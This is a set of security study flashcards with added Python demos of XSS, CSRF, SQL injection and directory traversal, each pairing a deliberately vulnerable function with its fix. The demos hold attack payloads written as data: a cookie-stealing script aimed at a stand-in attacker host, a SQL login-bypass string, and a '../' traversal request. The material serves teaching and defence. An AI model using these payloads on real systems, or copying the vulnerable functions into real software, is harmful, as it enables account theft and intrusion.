ANSWERS GRADED A+
✔✔Patch Management - ✔✔the planning, testing, implementing, and auditing of
patches
✔✔Hotfix - ✔✔patch a single problem to an OS or an application
✔✔Configuration Baselines - ✔✔a documented, known-good configuration of networking,
hardware, software, etc. against which later changes are measured and detected
✔✔"Patch Tuesday" - ✔✔Microsoft's monthly release of security patches on the second
Tuesday of each month. A nightmare day for system admins
✔✔Ext4 - ✔✔the fourth extended file system; the default file system on many Linux distributions
✔✔Security Zones - ✔✔Internet Explorer feature that groups sites by trust level, each zone with
its own security settings: Internet, Local intranet, Trusted sites, Restricted sites
✔✔Security Templates - ✔✔a good way to enforce browser and other security settings on a large
group of Windows computers, typically applied through Group Policy
✔✔Proxy Server - ✔✔a server that acts as a go-between for clients on the network and the Internet, so it can filter, log, and cache their requests
✔✔Hardening HDDs - ✔✔- Remove temporary files
- Periodically check system files
- Defragment drives
- Back up data
- System restore
- Whole disk encryption
✔✔XSS (Cross Site Scripting) - ✔✔where a threat actor injects script into a web page (reflected
from a request or stored on the server) so that the client's browser executes it as trusted
code, as if it came from the site the client is connected to
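The core of the XSS entry above is that the server echoes attacker-supplied text back as markup. The following Python snippet, added here as an illustration (it is not from the original study notes), shows a page renderer that does exactly that beside one that HTML-encodes the untrusted text. The comment payload and the `attacker.invalid` host name are constructed for the demo.

```python
import html

# Constructed sample input: a "comment" an attacker submits to the site.
# If the page echoes it unescaped, every visitor's browser runs the script with
# the site's origin, here shipping their cookie to a hypothetical attacker host.
PAYLOAD = (
    '<script>new Image().src="https://attacker.invalid/c?"'
    '+encodeURIComponent(document.cookie)</script>'
)


def render_vulnerable(comment: str) -> str:
    """Inserts untrusted text straight into the HTML body (the XSS bug)."""
    return f"<p>Comment: {comment}</p>"


def render_safe(comment: str) -> str:
    """HTML-encodes the untrusted text so the browser treats it as data, not
    markup. quote=True also encodes quotes, which matters when the value lands
    inside an attribute such as value="...".
    """
    return f"<p>Comment: {html.escape(comment, quote=True)}</p>"


def has_live_script_tag(page: str) -> bool:
    """Crude check used by the demo: does a real <script> tag survive in the output?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))  # script tag intact: runs in the victim's browser
    print(render_safe(PAYLOAD))        # appears as literal text, never executes
```

Output encoding is context-specific: `html.escape` is right for text and attribute values, but a value dropped into a `<script>` block or a URL needs its own encoder, and a real application should let its template engine escape by default rather than call `html.escape` by hand.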
✔✔Browser Security - ✔✔- Implement policies
- Train users
- Use a proxy and content filter
- Secure against malicious code
✔✔XSRF (cross-site request forgery) - ✔✔An attack that causes a logged-in user's browser to
perform actions on a website without the user's knowledge. The forged request succeeds
because the browser automatically attaches the user's session cookie to it; the attacker
never sees the cookie itself, which is what distinguishes XSRF from session hijacking.
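The standard defense against the XSRF attack described above is a per-session token that the legitimate page embeds in its forms and that a cross-site attacker cannot read. The Python below is an added example, not code from the study notes; the in-memory session store, the user `alice`, and the `attacker.invalid` host are constructed for the demo.

```python
import hmac
import secrets

# In-memory session store (constructed for the demo): session id -> state.
# In a real app the session id is what the browser keeps in a cookie.
SESSIONS = {}


def new_session(user="alice", email="alice@example.com"):
    """Log a user in and mint a per-session CSRF token alongside the session."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": user, "email": email,
                     "csrf_token": secrets.token_urlsafe(32)}
    return sid


def render_form(sid):
    """The legitimate page embeds the token in the form. A page on another
    origin cannot read it because of the browser's same-origin policy."""
    token = SESSIONS[sid]["csrf_token"]
    return (f'<form method="POST" action="/change-email">'
            f'<input type="hidden" name="csrf_token" value="{token}">'
            f'<input name="email"><button>Save</button></form>')


def change_email_vulnerable(sid, form):
    """Trusts the session cookie alone. A hidden form on attacker.invalid that
    the victim's browser auto-submits carries that cookie, so this succeeds."""
    SESSIONS[sid]["email"] = form["email"]
    return 200


def change_email_safe(sid, form):
    """Also requires the per-session token, compared in constant time."""
    expected = SESSIONS[sid]["csrf_token"].encode()
    supplied = str(form.get("csrf_token", "")).encode()
    if not hmac.compare_digest(expected, supplied):
        return 403
    SESSIONS[sid]["email"] = form["email"]
    return 200


# Constructed forged request: the fields an attacker's page makes the victim's
# browser POST. It has no way to include the token.
FORGED_FORM = {"email": "attacker@attacker.invalid"}
```

Modern browsers add a second layer with the `SameSite` cookie attribute, which stops the cookie from being attached to most cross-site POSTs, but the token check is still what lets the server reject a forged request on its own.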
✔✔LSOs (Locally Shared Objects) - ✔✔"Flash cookies": similar to cookies, but data stored by
Adobe Flash-based websites outside the browser's normal cookie controls
✔✔UAC (User Account Control) - ✔✔a security component of Windows Vista and newer versions
that runs every user, including members of the Administrators group, with standard user
rights by default and prompts for consent or credentials before granting full administrative
rights to an action
✔✔SDLC (Software Development Life Cycle) - ✔✔an organized process of developing
a secure application throughout the life of the project
✔✔Session Cookies - ✔✔the good - they maintain site state and authentication information for
the current visit, e.g., you stay logged in to Amazon and your cart stays loaded as you move
between pages
✔✔Agile - ✔✔breaks work into small increments and is designed to be more adaptive to
change. Has a focus on customer satisfaction
✔✔Tracking Cookies - ✔✔good or bad - maintain information about you and which sites your
browser has visited. Often used by marketing professionals, but can also be used
maliciously
✔✔DevOps Principles - ✔✔the collaboration between Development and Operations
groups for coding, testing, and releasing software
✔✔Session Hijacking - ✔✔the ugly - a threat actor has stolen or guessed your session
cookie and is using it to act as you on the site
✔✔Secure Code Review - ✔✔a manual or tool-assisted inspection of source code for security
defects; findings are prioritized by how the affected code is used and the impact of the flaw
✔✔Least Privilege - ✔✔users should have only access to what they need, and no more
✔✔Input Validation - ✔✔checks that user input matches what the program expects (type,
length, range, format) before it is accepted, rejecting anything else
✔✔SQL Injection - ✔✔injecting SQL statements through a user input field (e.g., a browser form)
so that the application's database executes them. A common attack
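To make the SQL Injection entry concrete, here is an added Python example (not from the study notes) of the classic login bypass, with the vulnerable string-built query beside its parameterized fix. The SQLite users table, the user `alice`, and the payload are constructed for the demo; storing passwords in plaintext is done only to keep the demo short.

```python
import sqlite3


def setup_db():
    """Constructed demo database with one user. Plaintext passwords are for the
    demo only; real code stores salted password hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'correct horse battery')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Builds the query by string formatting: user input becomes SQL syntax."""
    query = (f"SELECT COUNT(*) FROM users "
             f"WHERE username = '{username}' AND password = '{password}'")
    return conn.execute(query).fetchone()[0] > 0


def login_safe(conn, username, password):
    """Parameterized query: the driver passes the values separately from the
    statement, so a quote in the input is just a character, never a delimiter."""
    query = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone()[0] > 0


# Constructed attacker input typed into the password field. The vulnerable
# query becomes
#   ... WHERE username = 'nobody' AND password = '' OR '1'='1'
# and because AND binds tighter than OR, the row count is always > 0.
PAYLOAD = "' OR '1'='1"

if __name__ == "__main__":
    db = setup_db()
    print(login_vulnerable(db, "nobody", PAYLOAD))  # True: authentication bypassed
    print(login_safe(db, "nobody", PAYLOAD))        # False: treated as a literal password
```

The `?` placeholder is SQLite's style; other drivers use `%s` or `:name`, but the principle is the same: never concatenate untrusted input into the statement text.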
✔✔Directory Traversal - ✔✔sending crafted input (typically "../" sequences) in a file request to
read files or directories outside the location the server intended to expose
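The following Python example, added here and not part of the study notes, serves both the Input Validation entry and the Directory Traversal entry above: a file handler that joins the requested name onto the web root without checks, beside one that first allowlists the name and then canonicalizes the path and confirms it is still inside the root. The temporary web root, `index.html`, and the `config.txt` secret one level up are constructed for the demo.

```python
import os
import re
import tempfile
from pathlib import Path

# Input validation layer: a file name is letters, digits, dot, dash, underscore,
# no slashes, and may not start with a dot (so "../" and ".htaccess" are out).
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")


def make_site():
    """Constructed demo layout: a web root with one page, plus a secret file one
    level above the root that must never be served. Returns the web root."""
    root = Path(tempfile.mkdtemp())
    public = root / "public"
    public.mkdir()
    (public / "index.html").write_text("<h1>hello</h1>")
    (root / "config.txt").write_text("db_password=hunter2")
    return public


def serve_vulnerable(public, requested):
    """Joins the request onto the web root with no checks; '../' walks out of it."""
    path = os.path.join(public, requested)
    try:
        with open(path) as f:
            return 200, f.read()
    except OSError:
        return 404, None


def serve_safe(public, requested):
    """Two layers: reject names outside the allowlist (input validation), then
    resolve symlinks and '..' and confirm the real path is still under the web
    root (traversal check). The second layer catches a symlink inside the root
    that points outside it, which the name check alone cannot see."""
    if not SAFE_NAME.match(requested):
        return 400, None
    base = public.resolve()
    target = (base / requested).resolve()
    if os.path.commonpath([base, target]) != str(base):
        return 403, None
    if not target.is_file():
        return 404, None
    return 200, target.read_text()


if __name__ == "__main__":
    root = make_site()
    print(serve_vulnerable(root, "../config.txt"))  # (200, 'db_password=hunter2')
    print(serve_safe(root, "../config.txt"))        # (400, None)
    print(serve_safe(root, "index.html"))           # (200, '<h1>hello</h1>')
```

Checking the resolved path against the resolved root (rather than string-matching for `..`) is what defeats encoded variants such as `%2e%2e/` once the framework has decoded them, and the allowlist rejects them even earlier.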
✔✔Buffer Overflow - ✔✔providing more data to a user field than the program allocated for it, so
the excess overwrites adjacent memory; can crash the program or let an attacker run code
✔✔SDLC Phases - ✔✔- Planning and Analysis